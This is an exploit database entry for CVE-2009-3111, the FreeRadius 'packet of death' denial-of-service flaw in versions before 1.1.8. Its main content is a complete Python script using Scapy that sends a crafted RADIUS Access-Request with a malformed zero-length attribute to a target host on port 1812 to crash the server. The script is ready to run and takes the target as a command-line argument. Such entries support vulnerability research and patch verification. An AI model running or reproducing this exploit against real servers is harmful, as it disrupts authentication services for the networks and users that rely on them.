FreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)

2009-09-11T00:00:00
ID 1337DAY-ID-7004
Type zdt
Reporter Matthew Gillespie
Modified 2009-09-11T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            =================================================================
FreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)
=================================================================



#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>\n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)



#  0day.today [2018-02-16]  #